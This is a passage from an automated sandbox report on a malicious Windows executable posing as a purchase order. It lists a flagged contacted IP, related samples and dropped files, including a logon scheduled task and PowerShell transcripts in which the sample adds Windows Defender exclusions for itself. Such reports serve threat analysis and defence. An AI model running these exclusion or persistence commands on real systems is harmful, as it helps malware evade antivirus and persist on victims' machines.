      https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000003.386127494.00000000076E4000.00000004.00000001.sdmpfalse
        		high
        http://www.fontbureau.comasva#RFQ ORDER7678432213211.exe, 00000000.00000003.224155563.000000000564C000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.jiyu-kobo.co.jp/X7e#RFQ ORDER7678432213211.exe, 00000000.00000003.218089594.0000000005642000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.fontbureau.comaV.#RFQ ORDER7678432213211.exe, 00000000.00000003.220096464.000000000564C000.00000004.00000001.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.fontbureau.comgrita#RFQ ORDER7678432213211.exe, 00000000.00000003.219670990.000000000564F000.00000004.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://www.fontbureau.com/designers/frere-jones.html#RFQ ORDER7678432213211.exe, 00000000.00000003.220096464.000000000564C000.00000004.00000001.sdmpfalse
          		high
          http://www.jiyu-kobo.co.jp/s#RFQ ORDER7678432213211.exe, 00000000.00000003.218446869.0000000005646000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://www.jiyu-kobo.co.jp/Y0-f#RFQ ORDER7678432213211.exe, 00000000.00000003.218561472.0000000005649000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.jiyu-kobo.co.jp/#RFQ ORDER7678432213211.exe, 00000000.00000003.218561472.0000000005649000.00000004.00000001.sdmp, #RFQ ORDER7678432213211.exe, 00000000.00000003.218259854.000000000564A000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://www.jiyu-kobo.co.jp/n-u#RFQ ORDER7678432213211.exe, 00000000.00000003.218089594.0000000005642000.00000004.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://www.fonts.comp#RFQ ORDER7678432213211.exe, 00000000.00000003.215745931.0000000000DFC000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.jiyu-kobo.co.jp/Y.#RFQ ORDER7678432213211.exe, 00000000.00000003.218561472.0000000005649000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://www.fonts.com#RFQ ORDER7678432213211.exe, 00000000.00000003.215745931.0000000000DFC000.00000004.00000001.sdmpfalse
            		high
            http://www.jiyu-kobo.co.jp/2.#RFQ ORDER7678432213211.exe, 00000000.00000003.218359434.000000000564F000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.jiyu-kobo.co.jp/O.#RFQ ORDER7678432213211.exe, 00000000.00000003.218359434.000000000564F000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.424050500.0000000004F71000.00000004.00000001.sdmpfalse
              		high
              http://www.jiyu-kobo.co.jp/c.U#RFQ ORDER7678432213211.exe, 00000000.00000003.218359434.000000000564F000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.jiyu-kobo.co.jp/rV.#RFQ ORDER7678432213211.exe, 00000000.00000003.218089594.0000000005642000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.sakkal.com#RFQ ORDER7678432213211.exe, 00000000.00000003.218561472.0000000005649000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown

              Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public

              IPDomainCountryFlagASNASN NameMalicious
              194.5.98.120
              		unknownNetherlands
              		208476DANILENKODEtrue

              General Information

              Joe Sandbox Version:33.0.0 White Diamond
              Analysis ID:451085
              Start date:20.07.2021
              Start time:08:12:09
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 10m 44s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:#RFQ ORDER7678432213211.exe
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:33
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@15/20@0/1
              EGA Information:Failed
              HDC Information:Failed
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 139
              • Number of non-executed functions: 10
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .exe
              Warnings:
              Show All
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
              • Not all processes where analyzed, report is missing behavior information
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              08:13:33API Interceptor708x Sleep call for process: #RFQ ORDER7678432213211.exe modified
              08:13:44API Interceptor116x Sleep call for process: powershell.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              194.5.98.120ZwN0lL3CzU.exeGet hashmaliciousBrowse
                #RFQ ORDER484475577797.exeGet hashmaliciousBrowse
                  Purchase_Order_Form_4667ROO3.exeGet hashmaliciousBrowse
                    IMG-06-05-345678909876543.exeGet hashmaliciousBrowse

                      Domains

                      No context

                      ASN

                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                      DANILENKODEORDER.exeGet hashmaliciousBrowse
                      • 194.5.98.23
                      Q_007880.exeGet hashmaliciousBrowse
                      • 194.5.97.168
                      eQqnH61qiB.exeGet hashmaliciousBrowse
                      • 194.5.98.207
                      B32E407DC3284184684B29FD5235CBEDF2B60F60AED84.exeGet hashmaliciousBrowse
                      • 194.5.98.15
                      MbBw6XTmif.exeGet hashmaliciousBrowse
                      • 194.5.98.107
                      Jose Luis Ezeiza.cv7-15-2021.exeGet hashmaliciousBrowse
                      • 194.5.98.8
                      t3uss3bjUL.exeGet hashmaliciousBrowse
                      • 194.5.98.182
                      Agree Ment Letter-34222876190544.exeGet hashmaliciousBrowse
                      • 194.5.98.63
                      purestub.exeGet hashmaliciousBrowse
                      • 194.5.98.63
                      RFQ4100003433189994565.exeGet hashmaliciousBrowse
                      • 194.5.98.195
                      Order0045439090.exeGet hashmaliciousBrowse
                      • 194.5.98.8
                      TPJCc3cswr.exeGet hashmaliciousBrowse
                      • 194.5.97.44
                      Proof of payment.exeGet hashmaliciousBrowse
                      • 194.5.97.181
                      Payment Schedule.xlsxGet hashmaliciousBrowse
                      • 194.5.97.44
                      FbJ8HGm3HU.exeGet hashmaliciousBrowse
                      • 194.5.98.210
                      sRXwLQjycE.exeGet hashmaliciousBrowse
                      • 194.5.98.107
                      elmPEd3zO7.exeGet hashmaliciousBrowse
                      • 194.5.97.131
                      proof of payment.scr.exeGet hashmaliciousBrowse
                      • 194.5.98.5
                      4B9CaCxB3Q.exeGet hashmaliciousBrowse
                      • 194.5.98.207
                      yb6le40gR2.exeGet hashmaliciousBrowse
                      • 194.5.98.210

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\#RFQ ORDER7678432213211.exe.log
                      Process:C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:modified
                      Size (bytes):1406
                      Entropy (8bit):5.341099307467139
                      Encrypted:false
                      SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmER:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHg
                      MD5:E5FA1A53BA6D70E18192AF6AF7CFDBFA
                      SHA1:1C076481F11366751B8DA795C98A54DE8D1D82D5
                      SHA-256:1D7BAA6D3EB5A504FD4652BC01A0864DEE898D35D9E29D03EB4A60B0D6405D83
                      SHA-512:77850814E24DB48E3DDF9DF5B6A8110EE1A823BAABA800F89CD353EAC7F72E48B13F3F4A4DC8E5F0FAA707A7F14ED90577CF1CB106A0422F0BEDD1EFD2E940E4
                      Malicious:true
                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):14734
                      Entropy (8bit):4.993014478972177
                      Encrypted:false
                      SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                      MD5:8D5E194411E038C060288366D6766D3D
                      SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                      SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                      SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                      Malicious:false
                      Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):22376
                      Entropy (8bit):5.6011437476690995
                      Encrypted:false
                      SSDEEP:384:mtCDtPD3nMSoDHgSBKn0LultIO/7Y9g9SJ3xq1BMrmPZ1AV7HtWwu564I+fJzg:b37os4K6ultR79cZu4q1O
                      MD5:59B78DBBB727A10360D42CDD87E4F00B
                      SHA1:93AAFD5EAAB8630C2C0414200107BBEE63CB0461
                      SHA-256:61E26BCF20A5A4285027EB793DFE60E6D960FEC1CF6988187DF2AFF5A8B0AEFF
                      SHA-512:4A9D35BB74092D778AAE430C8A364C678C2264BD694ED401A3C5B69987ACC650EDB60FEA057A1EACE91BE41646ADA192AC3E71B1F0B1655A6574084C7B5A9DC0
                      Malicious:false
                      Preview: @...e...............................R.....r..........@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3lbm0dym.0pl.ps1
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview: 1
                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5bowk3z4.alr.ps1
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview: 1
                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jkmlqmz3.kot.psm1
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview: 1
                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mbvx1mrl.nve.psm1
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview: 1
                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mjdu1muo.pll.ps1
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview: 1
                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uwb0ckt4.xfw.psm1
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Preview: 1
                      C:\Users\user\AppData\Local\Temp\tmpFD92.tmp
                      Process:C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe
                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1644
                      Entropy (8bit):5.191372227906604
                      Encrypted:false
                      SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBFNtn:cbh47TlNQ//rydbz9I3YODOLNdq3P
                      MD5:C4BC1F6430E99ECF81752591B68F61E4
                      SHA1:EB94AEA189CE6B14A93DBCE1D95216E30C645DF4
                      SHA-256:2414C3BBC0BCEACEA13605FDF2BFC30407EDCA1966BC833EBAB1CE2FFF111DE2
                      SHA-512:449D433339BC70094DB9FE8C34845235624EF9AB3D0238FC01C47F19674DF6438DDB4BBBCAE46D8FE367CDC018A36212B6BE38FE273DD7C2DC4A886DCAC13CE3
                      Malicious:true
                      Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                      C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat
                      Process:C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):2784
                      Entropy (8bit):7.024371743172393
                      Encrypted:false
                      SSDEEP:48:Ik/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwfk/lCrwZ:flC0IlC0IlC0IlC0IlC0IlC0IlC0IlCr
                      MD5:6D2C1BD8306716462108A6A3B4069F75
                      SHA1:F46B24F6060F5F15F05CB3C1CFE633E349FFF316
                      SHA-256:861DDBD599B4033924CDE39DDA488C7F01F36734489859355F7F419AB75B31C0
                      SHA-512:6B231729623A94DC1DED8F6DC21F7B8EC1F109F061A137B037694AAF8013B434654F7893B7B44B4979105A20921BF0C68CA32AA189DFBD85F66AB86A6F64E0ED
                      Malicious:false
                      Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.
                      C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                      Process:C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe
                      File Type:Non-ISO extended-ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):8
                      Entropy (8bit):3.0
                      Encrypted:false
                      SSDEEP:3:mu8n:mu8
                      MD5:F95935841A379CDF26C0AE3A4C0FBBE5
                      SHA1:4C11219A155A69DD265A6DBC30B08D75675B88EC
                      SHA-256:6248547EF44A01CC92AEEF2DE7A5B1EDDEA0B48D03B1CB020F8087BE1ED22263
                      SHA-512:2A28206B5BF60C54AE141DB67175A652A5F1C5FA51C421015D9996DDE29C169565792398DBE409D818CB3BB772C0C76E6DBFDC005BF5174935D919B42EFF2E03
                      Malicious:true
                      Preview: .....K.H
                      C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe
                      Process:C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):1084928
                      Entropy (8bit):7.60637440768652
                      Encrypted:false
                      SSDEEP:24576:JU3ej57dEAKrvDBhGw4S3hYA0abY7VZ6Iyvv9JQ0NGNPV:ZALX3x0TrS7V
                      MD5:2F286CD817B368E8A747E8F0D8F28825
                      SHA1:E49BEEC02D942E12B0DAD74D81AB8ED4F02667E2
                      SHA-256:B291D719522053A662CADD70B131668A1D953D4C4DD648E8A5647B689EB6341D
                      SHA-512:3347116D44099808D4BBC050BC45C6B207ADC8C75E2BCFDFC49D3D535328C9DDEEBC0DED194B0C99E2F4EF021E1CFCA221F6F09EEF7FA77322E103671A4009CC
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 13%
                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5................P.............&.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...,.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............|...........................................................0............(....( .........(.....o!....*.....................("......(#......($......(%......(&....*N..(....o....('....*&..((....*.s)........s*........s+........s,........s-........*....0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*.0...........~....o1....+..*.0...........~....o2....+..*&..(3....*...0..<........~.....(4.....,!r...p.....(5...o6...s7............~.....
                      C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe:Zone.Identifier
                      Process:C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Preview: [ZoneTransfer]....ZoneId=0
                      C:\Users\user\Documents\20210720\PowerShell_transcript.226546.QECk8fRN.20210720081336.txt
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):3595
                      Entropy (8bit):5.398774077157319
                      Encrypted:false
                      SSDEEP:96:BZGLh/NfctqDo1ZP2wZnh/NfctqDo1Zfq04Y0c4Y0c4Y0YbZei:a32xZYEYEY/Ei
                      MD5:74ECE1B3B7B74B56D45D0B249CEA1026
                      SHA1:F3262670D2FF79491054B542E1F1FEEDA11795A8
                      SHA-256:8C4AE9368E03AEB005387E0ED70E0AF86619C35536D349E7982AC8C75700BC54
                      SHA-512:C3F1354E2E164F15242599D81FEEF93865A2BD21251049485E696512A8784CA36D98AB287DAC6FBA6973C78632A44A3DD24D4F19579B77DAB363013CA39F9AA3
                      Malicious:false
                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210720081403..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 226546 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe..Process ID: 6052..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210720081404..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe..**********************..Command start time: 20210720081716..**********************..PS>TerminatingError(Add-MpPreference): "A positional paramet
                      C:\Users\user\Documents\20210720\PowerShell_transcript.226546.u9dWU6FT.20210720081341.txt
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5793
                      Entropy (8bit):5.412847263408266
                      Encrypted:false
                      SSDEEP:96:BZNh/NVqDo1ZLZjh/NVqDo1ZDv1HjZAh/NVqDo1ZSaXXpZS:n
                      MD5:94A5AE9AD0D8454A4EF076656F8CD28C
                      SHA1:121D585258DF4F2E7F6014EDAE62E7B3DBAB28D2
                      SHA-256:D772214C85FA0304F10BAE0A6EF2E121D0E178FBCF5D1D5E7E365121C1E0D09C
                      SHA-512:540E05271914407E668505658AD2690CA34F146E9488493285559508DFDB7AF27E7CB157DCFEBD5033C5E1DE25490ED4661BDF40856D6F959AE320DB336A8946
                      Malicious:false
                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210720081343..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 226546 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe..Process ID: 1848..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210720081343..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe..**********************..Windows PowerShell transcript start..Start time: 20210720081837..Username: computer\user..RunAs User: computer\ha
                      C:\Users\user\Documents\20210720\PowerShell_transcript.226546.xFvC9uuU.20210720081339.txt
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5793
                      Entropy (8bit):5.408644517030285
                      Encrypted:false
                      SSDEEP:96:BZoh/NhqDo1ZGZlSh/NhqDo1Z6v1HjZYh/NhqDo1ZWaXXhZ+:b7
